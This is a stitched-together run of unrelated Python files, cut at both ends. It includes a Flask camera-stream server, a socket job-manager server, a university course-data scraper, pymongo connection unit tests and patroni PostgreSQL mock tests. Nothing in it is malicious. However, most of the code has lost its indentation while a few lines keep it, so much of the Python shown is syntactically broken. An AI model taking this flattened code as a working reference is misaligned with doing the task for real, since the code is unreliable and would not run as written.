from mini_vstreamer.api.defaults import app, api, system
from mini_vstreamer.api.endpoints.configs import ns as config_ns
from mini_vstreamer.core.config import ConfigIO
from mini_vstreamer.core.stream.queue import mutate_system as load_queues
from mini_vstreamer.core.stream.camera import mutate_system as load_cameras
def setup(flask_app):
#flask_app.config['SERVER_NAME'] = '.0:8888'
flask_app.config['SWAGGER_UI_DOC_EXPANSION'] = 'list'
flask_app.config['RESTPLUS_VALIDATE'] = True
flask_app.config['RESTPLUS_MASK_SWAGGER'] = False
#flask_app.config['ERROR_404_HELP'] =
def initialize_app(flask_app):
setup(flask_app)
blueprint = Blueprint('api', __name__, url_prefix='/api')
api.init_app(blueprint)
@flask_app.route('/foo')
def foo():
return 'foo'
api.add_namespace(config_ns)
#api.add_namespace(blog_categories_namespace)
flask_app.register_blueprint(blueprint)
#db.init_app(flask_app
def independent_collector():
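    # Continuously drain frames from the shared frame queue and keep only the
    # most recent frame per camera in system['video'].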
    while True:
        if system['queues']['frames'] is None:
            print('queue is None')
            time.sleep(0.5)
            continue
        camera_name, frame = system['queues']['frames'].get()
        system['video'][camera_name] = frame
        system['queues']['frames'].task_done()
def main():
initialize_app(app)
logging.info('>>>>> Starting development server at http://{}/api/ <<<<<'.format(app.config['SERVER_NAME']))
config = ConfigIO('./config.yaml')
load_queues(config)
load_cameras(config)
c_thread = Thread(name='Collector' ,target=independent_collector, args=())
c_thread.daemon=True
c_thread.start()
app.run(host='0.0.0.0', port=8888, threaded=True)
if __name__ == '__main__':
main()
|
server.py
|
import sys
try:
sys.dont_write_bytecode = True
except:
pass
import os
FINISH = False
manager = None
zeLock = None
def checkPsUtil():
try:
import psutil
except:
raise Exception("Python package psutil could not be imported!! Aborting.")
def periodicRefresh():
""" Periodic refresh launched in a thread to handle jobs killed outside the Sserver """
global FINISH, manager, zeLock
import time
while not FINISH:
zeLock.acquire()
manager.refresh()
zeLock.release()
time.sleep(2)
def main1():
global manager, FINISH, zeLock
import threading
import socket
from port import PORT
import job_manager
zeLock = threading.Lock()
manager = job_manager.SJobManager()
th = threading.Thread(target=periodicRefresh)
th.start()
HOST = '' # Symbolic name meaning all available interfaces
# Arbitrary non-privileged port
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((HOST, PORT))
s.listen(1)
ok=1
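    # Each accepted connection delivers a single request; the loop stops when
    # manager.handle() returns a falsy value.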
while ok:
conn, addr = s.accept()
data = conn.recv(job_manager.MAX_SEND_RCV_SIZE)
zeLock.acquire()
ok = manager.handle(conn,data.decode("UTF-8"))
zeLock.release()
FINISH = True
th.join()
s.close()
def main2():
import socket
from port import PORT
import job_manager
manager = job_manager.SJobManager()
HOST = '' # Symbolic name meaning all available interfaces
# Arbitrary non-privileged port
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((HOST, PORT))
s.listen(1)
ok=1
while ok:
conn, addr = s.accept()
data = conn.recv(1024)
try:
            from importlib import reload  # reload() is no longer a builtin in Python 3
            reload(job_manager) ## [ABN] hmmm, not too sure now this is in a class ...
ok = manager.handle(conn,data)
except :
print ("Error: %s" % data)
print ("Unexpected error:")
print(sys.exc_info()[1])
s.close()
pass
if __name__ == '__main__':
checkPsUtil()
main1()
pass
|
aggregate.py
|
# @file aggregate.py
# @brief One script to rule them all.
#
# Downloads schedule data for a specific semester, including course
# meeting times, course descriptions, pre/corequisites, FCEs, and so on.
# @author Justin Gallagher (jrgallag@andrew.cmu.edu)
# @since 2015-04-07
import json
import os.path
from datetime import date
from cmu_course_api.parse_descs import get_course_desc
from cmu_course_api.parse_schedules import parse_schedules
# imports used for multithreading
import threading
from queue import Queue
from os import cpu_count
from queue import Empty
# Constants
SOURCES = os.path.join(os.path.dirname(__file__), 'data/schedule_pages.txt')
SEMESTER_ABBREV = {
'Spring': 'S',
'Fall': 'F',
'Summer': 'M'
}
# @function aggregate
# @brief Combines the course descriptions and schedules into one object.
# @param schedules: Course schedules object as returned by parse_descs.
# @return An object containing the aggregate of the three datasets.
def aggregate(schedules):
courses = {}
semester = schedules['semester'].split(' ')[0]
semester = SEMESTER_ABBREV[semester]
year = schedules['semester'].split(' ')[-1][2:]
count = cpu_count()
lock = threading.Lock()
queue = Queue()
if count is None:
count = 4
for course in schedules['schedules']:
queue.put(course)
queue_size = queue.qsize()
fces_processed = 0
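    # Worker: pull course numbers off the queue, fetch each description, and
    # merge the schedule fields into it; exits once the queue stays empty for
    # the 4-second get() timeout.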
    def run():
        nonlocal queue_size, fces_processed
        while True:
            try:
                course = queue.get(timeout=4)
            except Empty:
                return
with lock:
fces_processed += 1
print('\r[{}/{}] Getting description for {}...'.format(
fces_processed, queue_size, course['num']), end="")
desc = get_course_desc(course['num'], semester, year)
desc['name'] = course['title']
try:
desc['units'] = float(course['units'])
except ValueError:
desc['units'] = None
desc['department'] = course['department']
desc['lectures'] = course['lectures']
desc['sections'] = course['sections']
names_dict = desc.pop('names_dict', {})
for key in ('lectures', 'sections'):
for meeting in desc[key]:
if meeting['name'] in names_dict:
meeting['instructors'] = names_dict[meeting['name']]
number = course['num'][:2] + '-' + course['num'][2:]
with lock:
courses[number] = desc
queue.task_done()
print("running on " + str(count) + " threads")
for _ in range(count):
thread = threading.Thread(target=run)
        thread.daemon = True
thread.start()
queue.join()
print("")
return {'courses': courses, 'rundate': str(date.today()),
'semester': schedules['semester']}
# @function get_course_data
# @brief Used for retrieving all information from the course-api for a given
# semester.
# @param semester: The semester to get data for. Must be one of [S, M1, M2, F].
# @return Object containing all course-api data - see README.md for more
# information.
def get_course_data(semester):
schedules = parse_schedules(semester)
return aggregate(schedules)
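# Example usage (illustrative only; the semester code and output path are arbitrary):
#     data = get_course_data('F')
#     with open('courses.json', 'w') as out:
#         json.dump(data, out)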
|
test_connection.py
|
# Copyright 2009-2012 10gen, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test the connection module."""
import datetime
import os
import sys
import time
import thread
import unittest
sys.path[0:0] = [""]
from nose.plugins.skip import SkipTest
from bson.son import SON
from bson.tz_util import utc
from pymongo.connection import Connection
from pymongo.database import Database
from pymongo.pool import NO_REQUEST, NO_SOCKET_YET, SocketInfo
from pymongo.errors import (AutoReconnect,
ConfigurationError,
ConnectionFailure,
InvalidName,
InvalidURI,
OperationFailure)
from test import version
from test.utils import is_mongos, server_is_master_with_slave, delay
host = os.environ.get("DB_IP", "localhost")
port = int(os.environ.get("DB_PORT", 27017))
def get_connection(*args, **kwargs):
return Connection(host, port, *args, **kwargs)
class TestConnection(unittest.TestCase):
def setUp(self):
self.host = os.environ.get("DB_IP", "localhost")
self.port = int(os.environ.get("DB_PORT", 27017))
def test_types(self):
self.assertRaises(TypeError, Connection, 1)
self.assertRaises(TypeError, Connection, 1.14)
self.assertRaises(TypeError, Connection, "localhost", "27017")
self.assertRaises(TypeError, Connection, "localhost", 1.14)
self.assertRaises(TypeError, Connection, "localhost", [])
self.assertRaises(ConfigurationError, Connection, [])
def test_constants(self):
Connection.HOST = self.host
Connection.PORT = self.port
self.assertTrue(Connection())
Connection.HOST = "somedomainthatdoesntexist.org"
Connection.PORT = 123456789
self.assertRaises(ConnectionFailure, Connection, connectTimeoutMS=600)
self.assertTrue(Connection(self.host, self.port))
Connection.HOST = self.host
Connection.PORT = self.port
self.assertTrue(Connection())
def test_connect(self):
self.assertRaises(ConnectionFailure, Connection,
"somedomainthatdoesntexist.org", connectTimeoutMS=600)
self.assertRaises(ConnectionFailure, Connection, self.host, 123456789)
self.assertTrue(Connection(self.host, self.port))
def test_host_w_port(self):
self.assertTrue(Connection("%s:%d" % (self.host, self.port)))
self.assertRaises(ConnectionFailure, Connection,
"%s:1234567" % (self.host,), self.port)
def test_repr(self):
self.assertEqual(repr(Connection(self.host, self.port)),
"Connection('%s', %d)" % (self.host, self.port))
def test_getters(self):
self.assertEqual(Connection(self.host, self.port).host, self.host)
self.assertEqual(Connection(self.host, self.port).port, self.port)
self.assertEqual(set([(self.host, self.port)]),
Connection(self.host, self.port).nodes)
def test_get_db(self):
connection = Connection(self.host, self.port)
def make_db(base, name):
return base[name]
self.assertRaises(InvalidName, make_db, connection, "")
self.assertRaises(InvalidName, make_db, connection, "te$t")
self.assertRaises(InvalidName, make_db, connection, "te.t")
self.assertRaises(InvalidName, make_db, connection, "te\\t")
self.assertRaises(InvalidName, make_db, connection, "te/t")
self.assertRaises(InvalidName, make_db, connection, "te st")
self.assertTrue(isinstance(connection.test, Database))
self.assertEqual(connection.test, connection["test"])
self.assertEqual(connection.test, Database(connection, "test"))
def test_database_names(self):
connection = Connection(self.host, self.port)
connection.pymongo_test.test.save({"dummy": u"object"})
connection.pymongo_test_mike.test.save({"dummy": u"object"})
dbs = connection.database_names()
self.assertTrue("pymongo_test" in dbs)
self.assertTrue("pymongo_test_mike" in dbs)
def test_drop_database(self):
connection = Connection(self.host, self.port)
self.assertRaises(TypeError, connection.drop_database, 5)
self.assertRaises(TypeError, connection.drop_database, None)
raise SkipTest("This test often fails due to SERVER-2329")
connection.pymongo_test.test.save({"dummy": u"object"})
dbs = connection.database_names()
self.assertTrue("pymongo_test" in dbs)
connection.drop_database("pymongo_test")
dbs = connection.database_names()
self.assertTrue("pymongo_test" not in dbs)
connection.pymongo_test.test.save({"dummy": u"object"})
dbs = connection.database_names()
self.assertTrue("pymongo_test" in dbs)
connection.drop_database(connection.pymongo_test)
dbs = connection.database_names()
self.assertTrue("pymongo_test" not in dbs)
def test_copy_db(self):
c = Connection(self.host, self.port)
self.assertTrue(c.in_request())
self.assertRaises(TypeError, c.copy_database, 4, "foo")
self.assertRaises(TypeError, c.copy_database, "foo", 4)
self.assertRaises(InvalidName, c.copy_database, "foo", "$foo")
c.pymongo_test.test.drop()
c.drop_database("pymongo_test1")
c.drop_database("pymongo_test2")
c.pymongo_test.test.insert({"foo": "bar"})
# Due to SERVER-2329, databases may not disappear from a master in a
# master-slave pair
if not server_is_master_with_slave(c):
self.assertFalse("pymongo_test1" in c.database_names())
self.assertFalse("pymongo_test2" in c.database_names())
c.copy_database("pymongo_test", "pymongo_test1")
# copy_database() didn't accidentally end the request
self.assertTrue(c.in_request())
self.assertTrue("pymongo_test1" in c.database_names())
self.assertEqual("bar", c.pymongo_test1.test.find_one()["foo"])
c.end_request()
c.copy_database("pymongo_test", "pymongo_test2",
"%s:%d" % (self.host, self.port))
# copy_database() didn't accidentally restart the request
self.assertFalse(c.in_request())
self.assertTrue("pymongo_test2" in c.database_names())
self.assertEqual("bar", c.pymongo_test2.test.find_one()["foo"])
if version.at_least(c, (1, 3, 3, 1)):
c.drop_database("pymongo_test1")
c.pymongo_test.add_user("mike", "password")
self.assertRaises(OperationFailure, c.copy_database,
"pymongo_test", "pymongo_test1",
username="foo", password="bar")
if not server_is_master_with_slave(c):
self.assertFalse("pymongo_test1" in c.database_names())
self.assertRaises(OperationFailure, c.copy_database,
"pymongo_test", "pymongo_test1",
username="mike", password="bar")
if not server_is_master_with_slave(c):
self.assertFalse("pymongo_test1" in c.database_names())
if not is_mongos(c):
# See SERVER-6427
c.copy_database("pymongo_test", "pymongo_test1",
username="mike", password="password")
self.assertTrue("pymongo_test1" in c.database_names())
self.assertEqual("bar", c.pymongo_test1.test.find_one()["foo"])
def test_iteration(self):
connection = Connection(self.host, self.port)
def iterate():
[a for a in connection]
self.assertRaises(TypeError, iterate)
def test_disconnect(self):
c = Connection(self.host, self.port)
coll = c.foo.bar
c.disconnect()
c.disconnect()
coll.count()
c.disconnect()
c.disconnect()
coll.count()
def test_from_uri(self):
c = Connection(self.host, self.port)
self.assertEqual(c, Connection("mongodb://%s:%d" %
(self.host, self.port)))
c.admin.system.users.remove({})
c.pymongo_test.system.users.remove({})
try:
# First admin user add fails gle in MongoDB >= 2.1.2
# See SERVER-4225 for more information.
c.admin.add_user("admin", "pass")
except OperationFailure:
pass
c.admin.authenticate("admin", "pass")
c.pymongo_test.add_user("user", "pass")
self.assertRaises(ConfigurationError, Connection,
"mongodb://foo:bar@%s:%d" % (self.host, self.port))
self.assertRaises(ConfigurationError, Connection,
"mongodb://admin:bar@%s:%d" % (self.host, self.port))
self.assertRaises(ConfigurationError, Connection,
"mongodb://user:pass@%s:%d" % (self.host, self.port))
Connection("mongodb://admin:pass@%s:%d" % (self.host, self.port))
self.assertRaises(ConfigurationError, Connection,
"mongodb://admin:pass@%s:%d/pymongo_test" %
(self.host, self.port))
self.assertRaises(ConfigurationError, Connection,
"mongodb://user:foo@%s:%d/pymongo_test" %
(self.host, self.port))
Connection("mongodb://user:pass@%s:%d/pymongo_test" %
(self.host, self.port))
self.assertTrue(Connection("mongodb://%s:%d" %
(self.host, self.port),
slave_okay=True).slave_okay)
self.assertTrue(Connection("mongodb://%s:%d/?slaveok=true;w=2" %
(self.host, self.port)).slave_okay)
c.admin.system.users.remove({})
c.pymongo_test.system.users.remove({})
def test_fork(self):
# Test using a connection before and after a fork.
if sys.platform == "win32":
raise SkipTest("Can't fork on windows")
try:
from multiprocessing import Process, Pipe
except ImportError:
raise SkipTest("No multiprocessing module")
db = Connection(self.host, self.port).pymongo_test
# Failure occurs if the connection is used before the fork
db.test.find_one()
db.connection.end_request()
def loop(pipe):
while True:
try:
db.test.insert({"a": "b"}, safe=True)
for _ in db.test.find():
pass
except:
pipe.send(True)
os._exit(1)
cp1, cc1 = Pipe()
cp2, cc2 = Pipe()
p1 = Process(target=loop, args=(cc1,))
p2 = Process(target=loop, args=(cc2,))
p1.start()
p2.start()
p1.join(1)
p2.join(1)
p1.terminate()
p2.terminate()
p1.join()
p2.join()
cc1.close()
cc2.close()
# recv will only have data if the subprocess failed
try:
cp1.recv()
self.fail()
except EOFError:
pass
try:
cp2.recv()
self.fail()
except EOFError:
pass
def test_document_class(self):
c = Connection(self.host, self.port)
db = c.pymongo_test
db.test.insert({"x": 1})
self.assertEqual(dict, c.document_class)
self.assertTrue(isinstance(db.test.find_one(), dict))
self.assertFalse(isinstance(db.test.find_one(), SON))
c.document_class = SON
self.assertEqual(SON, c.document_class)
self.assertTrue(isinstance(db.test.find_one(), SON))
self.assertFalse(isinstance(db.test.find_one(as_class=dict), SON))
c = Connection(self.host, self.port, document_class=SON)
db = c.pymongo_test
self.assertEqual(SON, c.document_class)
self.assertTrue(isinstance(db.test.find_one(), SON))
self.assertFalse(isinstance(db.test.find_one(as_class=dict), SON))
c.document_class = dict
self.assertEqual(dict, c.document_class)
self.assertTrue(isinstance(db.test.find_one(), dict))
self.assertFalse(isinstance(db.test.find_one(), SON))
def test_timeouts(self):
conn = Connection(self.host, self.port, connectTimeoutMS=10500)
self.assertEqual(10.5, conn._Connection__pool.conn_timeout)
conn = Connection(self.host, self.port, socketTimeoutMS=10500)
self.assertEqual(10.5, conn._Connection__pool.net_timeout)
def test_network_timeout(self):
no_timeout = Connection(self.host, self.port)
timeout_sec = 1
timeout = Connection(self.host, self.port, network_timeout=timeout_sec)
no_timeout.pymongo_test.drop_collection("test")
no_timeout.pymongo_test.test.insert({"x": 1}, safe=True)
# A $where clause that takes a second longer than the timeout
where_func = delay(timeout_sec + 1)
def get_x(db):
doc = db.test.find().where(where_func).next()
return doc["x"]
self.assertEqual(1, get_x(no_timeout.pymongo_test))
self.assertRaises(ConnectionFailure, get_x, timeout.pymongo_test)
def get_x_timeout(db, t):
doc = db.test.find(network_timeout=t).where(where_func).next()
return doc["x"]
self.assertEqual(1, get_x_timeout(timeout.pymongo_test, None))
self.assertRaises(ConnectionFailure, get_x_timeout,
no_timeout.pymongo_test, 0.1)
def test_tz_aware(self):
self.assertRaises(ConfigurationError, Connection, tz_aware='foo')
aware = Connection(self.host, self.port, tz_aware=True)
naive = Connection(self.host, self.port)
aware.pymongo_test.drop_collection("test")
now = datetime.datetime.utcnow()
aware.pymongo_test.test.insert({"x": now}, safe=True)
self.assertEqual(None, naive.pymongo_test.test.find_one()["x"].tzinfo)
self.assertEqual(utc, aware.pymongo_test.test.find_one()["x"].tzinfo)
self.assertEqual(
aware.pymongo_test.test.find_one()["x"].replace(tzinfo=None),
naive.pymongo_test.test.find_one()["x"])
def test_ipv6(self):
try:
connection = Connection("[::1]")
except:
# Either mongod was started without --ipv6
# or the OS doesn't support it (or both).
raise SkipTest("No IPv6")
# Try a few simple things
connection = Connection("mongodb://[::1]:%d" % (self.port,))
connection = Connection("mongodb://[::1]:%d/"
"?slaveOk=true" % (self.port,))
connection = Connection("[::1]:%d,"
"localhost:%d" % (self.port, self.port))
connection = Connection("localhost:%d,"
"[::1]:%d" % (self.port, self.port))
connection.pymongo_test.test.save({"dummy": u"object"})
connection.pymongo_test_bernie.test.save({"dummy": u"object"})
dbs = connection.database_names()
self.assertTrue("pymongo_test" in dbs)
self.assertTrue("pymongo_test_bernie" in dbs)
def test_fsync_lock_unlock(self):
c = get_connection()
if is_mongos(c):
raise SkipTest('fsync/lock not supported by mongos')
self.assertFalse(c.is_locked)
# async flushing not supported on windows...
if sys.platform not in ('cygwin', 'win32'):
c.fsync(async=True)
self.assertFalse(c.is_locked)
c.fsync(lock=True)
self.assertTrue(c.is_locked)
locked = True
c.unlock()
for _ in xrange(5):
locked = c.is_locked
if not locked:
break
time.sleep(1)
self.assertFalse(locked)
def test_contextlib(self):
if sys.version_info < (2, 6):
raise SkipTest("With statement requires Python >= 2.6")
import contextlib
conn = get_connection(auto_start_request=False)
conn.pymongo_test.drop_collection("test")
conn.pymongo_test.test.insert({"foo": "bar"})
# The socket used for the previous commands has been returned to the
# pool
self.assertEqual(1, len(conn._Connection__pool.sockets))
# We need exec here because if the Python version is less than 2.6
# these with-statements won't even compile.
exec """
with contextlib.closing(conn):
self.assertEqual("bar", conn.pymongo_test.test.find_one()["foo"])
self.assertEqual(0, len(conn._Connection__pool.sockets))
"""
exec """
with get_connection() as connection:
self.assertEqual("bar", connection.pymongo_test.test.find_one()["foo"])
# Calling conn.close() has reset the pool
self.assertEqual(0, len(connection._Connection__pool.sockets))
"""
def get_sock(self, pool):
sock_info = pool.get_socket((self.host, self.port))
return sock_info
def assertSameSock(self, pool):
sock_info0 = self.get_sock(pool)
sock_info1 = self.get_sock(pool)
self.assertEqual(sock_info0, sock_info1)
pool.maybe_return_socket(sock_info0)
pool.maybe_return_socket(sock_info1)
def assertDifferentSock(self, pool):
# We have to hold both SocketInfos at the same time, otherwise the
# first will send its socket back to the pool as soon as its ref count
# goes to zero, in which case the second SocketInfo we get will have
# the same socket as the first.
sock_info0 = self.get_sock(pool)
sock_info1 = self.get_sock(pool)
self.assertNotEqual(sock_info0, sock_info1)
pool.maybe_return_socket(sock_info0)
pool.maybe_return_socket(sock_info1)
def assertNoRequest(self, pool):
self.assertEqual(NO_REQUEST, pool._get_request_state())
def assertNoSocketYet(self, pool):
self.assertEqual(NO_SOCKET_YET, pool._get_request_state())
def assertRequestSocket(self, pool):
self.assertTrue(isinstance(pool._get_request_state(), SocketInfo))
def test_with_start_request(self):
conn = get_connection(auto_start_request=False)
pool = conn._Connection__pool
# No request started
self.assertNoRequest(pool)
self.assertDifferentSock(pool)
# Start a request
request_context_mgr = conn.start_request()
self.assertTrue(
isinstance(request_context_mgr, object)
)
self.assertNoSocketYet(pool)
self.assertSameSock(pool)
self.assertRequestSocket(pool)
# End request
request_context_mgr.__exit__(None, None, None)
self.assertNoRequest(pool)
self.assertDifferentSock(pool)
# Test the 'with' statement
if sys.version_info >= (2, 6):
# We need exec here because if the Python version is less than 2.6
# these with-statements won't even compile.
exec """
with conn.start_request() as request:
self.assertEqual(conn, request.connection)
self.assertNoSocketYet(pool)
self.assertSameSock(pool)
self.assertRequestSocket(pool)
"""
# Request has ended
self.assertNoRequest(pool)
self.assertDifferentSock(pool)
def test_auto_start_request(self):
for bad_horrible_value in (None, 5, 'hi!'):
self.assertRaises(
(TypeError, ConfigurationError),
lambda: get_connection(auto_start_request=bad_horrible_value)
)
# auto_start_request should default to True
conn = get_connection()
self.assertTrue(conn.auto_start_request)
self.assertTrue(conn.in_request())
pool = conn._Connection__pool
# Request started already, just from Connection constructor - it's a
# bit weird, but Connection does some socket stuff when it initializes
# and it ends up with a request socket
self.assertRequestSocket(pool)
self.assertSameSock(pool)
conn.end_request()
self.assertNoRequest(pool)
self.assertDifferentSock(pool)
# Trigger auto_start_request
conn.db.test.find_one()
self.assertRequestSocket(pool)
self.assertSameSock(pool)
def test_interrupt_signal(self):
if sys.platform.startswith('java'):
# We can't figure out how to raise an exception on a thread that's
# blocked on a socket, whether that's the main thread or a worker,
# without simply killing the whole thread in Jython. This suggests
# PYTHON-294 can't actually occur in Jython.
raise SkipTest("Can't test interrupts in Jython")
# Test fix for PYTHON-294 -- make sure Connection closes its
# socket if it gets an interrupt while waiting to recv() from it.
c = get_connection()
db = c.pymongo_test
# A $where clause which takes 1.5 sec to execute
where = delay(1.5)
# Need exactly 1 document so find() will execute its $where clause once
db.drop_collection('foo')
db.foo.insert({'_id': 1}, safe=True)
def interrupter():
# Raises KeyboardInterrupt in the main thread
time.sleep(0.25)
thread.interrupt_main()
thread.start_new_thread(interrupter, ())
raised = False
try:
# Will be interrupted by a KeyboardInterrupt.
db.foo.find({'$where': where}).next()
except KeyboardInterrupt:
raised = True
# Can't use self.assertRaises() because it doesn't catch system
# exceptions
self.assertTrue(raised, "Didn't raise expected KeyboardInterrupt")
        # Before the fix for PYTHON-294 this next call raised AssertionError --
        # Mongo's response to the previous find() would still be waiting to be
        # read on the socket, so the request ids wouldn't match.
self.assertEqual(
{'_id': 1},
db.foo.find().next()
)
if __name__ == "__main__":
unittest.main()
|
test_postgresql.py
|
import datetime
import mock # for the mock.call method, importing it without a namespace breaks python3
import os
import psycopg2
import shutil
import subprocess
import unittest
from mock import Mock, MagicMock, PropertyMock, patch, mock_open
from patroni.async_executor import CriticalTask
from patroni.dcs import Cluster, ClusterConfig, Leader, Member, RemoteMember, SyncState
from patroni.exceptions import PostgresConnectionException, PostgresException
from patroni.postgresql import Postgresql, STATE_REJECT, STATE_NO_RESPONSE
from patroni.postmaster import PostmasterProcess
from patroni.utils import RetryFailedError
from six.moves import builtins
from threading import Thread, current_thread
class MockCursor(object):
def __init__(self, connection):
self.connection = connection
self.closed = False
self.rowcount = 0
self.results = []
def execute(self, sql, *params):
if sql.startswith('blabla'):
raise psycopg2.ProgrammingError()
elif sql == 'CHECKPOINT' or sql.startswith('SELECT pg_catalog.pg_create_'):
raise psycopg2.OperationalError()
elif sql.startswith('RetryFailedError'):
raise RetryFailedError('retry')
elif sql.startswith('SELECT slot_name'):
self.results = [('blabla', 'physical'), ('foobar', 'physical'), ('ls', 'logical', 'a', 'b')]
elif sql.startswith('SELECT CASE WHEN pg_catalog.pg_is_in_recovery()'):
self.results = [(1, 2)]
elif sql.startswith('SELECT pg_catalog.pg_is_in_recovery()'):
self.results = [(False, 2)]
elif sql.startswith('WITH replication_info AS ('):
replication_info = '[{"application_name":"walreceiver","client_addr":"1.2.3.4",' +\
'"state":"streaming","sync_state":"async","sync_priority":0}]'
self.results = [('', 0, '', '', '', '', False, replication_info)]
elif sql.startswith('SELECT name, setting'):
self.results = [('wal_segment_size', '2048', '8kB', 'integer', 'internal'),
('search_path', 'public', None, 'string', 'user'),
('port', '5433', None, 'integer', 'postmaster'),
('listen_addresses', '*', None, 'string', 'postmaster'),
('autovacuum', 'on', None, 'bool', 'sighup'),
('unix_socket_directories', '/tmp', None, 'string', 'postmaster')]
elif sql.startswith('IDENTIFY_SYSTEM'):
self.results = [('1', 2, '0/402EEC0', '')]
elif sql.startswith('SELECT isdir, modification'):
self.results = [(False, datetime.datetime.now())]
elif sql.startswith('SELECT pg_catalog.pg_read_file'):
self.results = [('1\t0/40159C0\tno recovery target specified\n\n' +
'2\t1/40159C0\tno recovery target specified\n',)]
elif sql.startswith('TIMELINE_HISTORY '):
self.results = [('', b'x\t0/40159C0\tno recovery target specified\n\n' +
b'1\t0/40159C0\tno recovery target specified\n\n' +
b'2\t0/402DD98\tno recovery target specified\n\n' +
b'3\t0/403DD98\tno recovery target specified\n')]
else:
self.results = [(None, None, None, None, None, None, None, None, None, None)]
def fetchone(self):
return self.results[0]
def fetchall(self):
return self.results
def __iter__(self):
for i in self.results:
yield i
def __enter__(self):
return self
def __exit__(self, *args):
pass
class MockConnect(object):
server_version = 99999
autocommit = False
closed = 0
def cursor(self):
return MockCursor(self)
def __enter__(self):
return self
def __exit__(self, *args):
pass
@staticmethod
def close():
pass
class MockPostmaster(object):
def __init__(self, is_running=True, is_single_master=False):
self.is_running = Mock(return_value=is_running)
self.is_single_master = Mock(return_value=is_single_master)
self.wait_for_user_backends_to_close = Mock()
self.signal_stop = Mock(return_value=None)
self.wait = Mock()
def pg_controldata_string(*args, **kwargs):
return b"""
pg_control version number: 942
Catalog version number: 201509161
Database system identifier: 6200971513092291716
Database cluster state: shut down in recovery
pg_control last modified: Fri Oct 2 10:57:06 2015
Latest checkpoint location: 0/30000C8
Prior checkpoint location: 0/2000060
Latest checkpoint's REDO location: 0/3000090
Latest checkpoint's REDO WAL file: 000000020000000000000003
Latest checkpoint's TimeLineID: 2
Latest checkpoint's PrevTimeLineID: 2
Latest checkpoint's full_page_writes: on
Latest checkpoint's NextXID: 0/943
Latest checkpoint's NextOID: 24576
Latest checkpoint's NextMultiXactId: 1
Latest checkpoint's NextMultiOffset: 0
Latest checkpoint's oldestXID: 931
Latest checkpoint's oldestXID's DB: 1
Latest checkpoint's oldestActiveXID: 943
Latest checkpoint's oldestMultiXid: 1
Latest checkpoint's oldestMulti's DB: 1
Latest checkpoint's oldestCommitTs: 0
Latest checkpoint's newestCommitTs: 0
Time of latest checkpoint: Fri Oct 2 10:56:54 2015
Fake LSN counter for unlogged rels: 0/1
Minimum recovery ending location: 0/30241F8
Min recovery ending loc's timeline: 2
Backup start location: 0/0
Backup end location: 0/0
End-of-backup record required: no
wal_level setting: hot_standby
Current wal_log_hints setting: on
Current max_connections setting: 100
Current max_worker_processes setting: 8
Current max_prepared_xacts setting: 0
Current max_locks_per_xact setting: 64
Current track_commit_timestamp setting: off
Maximum data alignment: 8
Database block size: 8192
Blocks per segment of large relation: 131072
WAL block size: 8192
Bytes per WAL segment: 16777216
Maximum length of identifiers: 64
Maximum columns in an index: 32
Maximum size of a TOAST chunk: 1996
Size of a large-object chunk: 2048
Date/time type storage: 64-bit integers
Float4 argument passing: by value
Float8 argument passing: by value
Data page checksum version: 0
"""
def psycopg2_connect(*args, **kwargs):
return MockConnect()
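# Note on the mock wiring: the class-level patches below replace psycopg2.connect
# with psycopg2_connect(), so every connection the tests open is a MockConnect
# whose cursor() returns a MockCursor, and all queries are answered from the
# canned results defined in MockCursor.execute() instead of a real server.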
@patch('subprocess.call', Mock(return_value=0))
@patch('psycopg2.connect', psycopg2_connect)
class TestPostgresql(unittest.TestCase):
_PARAMETERS = {'wal_level': 'hot_standby', 'max_replication_slots': 5, 'f.oo': 'bar',
'search_path': 'public', 'hot_standby': 'on', 'max_wal_senders': 5,
'wal_keep_segments': 8, 'wal_log_hints': 'on', 'max_locks_per_transaction': 64,
'max_worker_processes': 8, 'max_connections': 100, 'max_prepared_transactions': 0,
'track_commit_timestamp': 'off', 'unix_socket_directories': '/tmp'}
@patch('subprocess.call', Mock(return_value=0))
@patch('psycopg2.connect', psycopg2_connect)
@patch('os.rename', Mock())
@patch.object(Postgresql, 'get_major_version', Mock(return_value=90600))
@patch.object(Postgresql, 'is_running', Mock(return_value=True))
def setUp(self):
self.data_dir = 'data/test0'
self.config_dir = self.data_dir
if not os.path.exists(self.data_dir):
os.makedirs(self.data_dir)
self.p = Postgresql({'name': 'test0', 'scope': 'batman', 'data_dir': self.data_dir,
'config_dir': self.config_dir, 'retry_timeout': 10, 'pgpass': '/tmp/pgpass0',
'listen': '127.0.0.2, 127.0.0.3:5432', 'connect_address': '127.0.0.2:5432',
'authentication': {'superuser': {'username': 'test', 'password': 'test'},
'replication': {'username': 'replicator', 'password': 'rep-pass'}},
'remove_data_directory_on_rewind_failure': True,
'use_pg_rewind': True, 'pg_ctl_timeout': 'bla',
'parameters': self._PARAMETERS,
'recovery_conf': {'foo': 'bar'},
'pg_hba': ['host all all 0.0.0.0/0 md5'],
'callbacks': {'on_start': 'true', 'on_stop': 'true', 'on_reload': 'true',
'on_restart': 'true', 'on_role_change': 'true'}})
self.p._callback_executor = Mock()
self.leadermem = Member(0, 'leader', 28, {'conn_url': 'postgres://replicator:rep-pass@127.0.0.1:5435/postgres'})
self.leader = Leader(-1, 28, self.leadermem)
self.other = Member(0, 'test-1', 28, {'conn_url': 'postgres://replicator:rep-pass@127.0.0.1:5433/postgres',
'tags': {'replicatefrom': 'leader'}})
self.me = Member(0, 'test0', 28, {'conn_url': 'postgres://replicator:rep-pass@127.0.0.1:5434/postgres'})
def tearDown(self):
shutil.rmtree('data')
def test__initdb(self):
self.assertRaises(Exception, self.p.bootstrap, {'initdb': [{'pgdata': 'bar'}]})
self.assertRaises(Exception, self.p.bootstrap, {'initdb': [{'foo': 'bar', 1: 2}]})
self.assertRaises(Exception, self.p.bootstrap, {'initdb': [1]})
self.assertRaises(Exception, self.p.bootstrap, {'initdb': 1})
@patch('os.path.exists', Mock(return_value=True))
@patch('os.unlink', Mock())
def test_delete_trigger_file(self):
self.p.delete_trigger_file()
@patch('subprocess.Popen')
@patch.object(Postgresql, 'wait_for_startup')
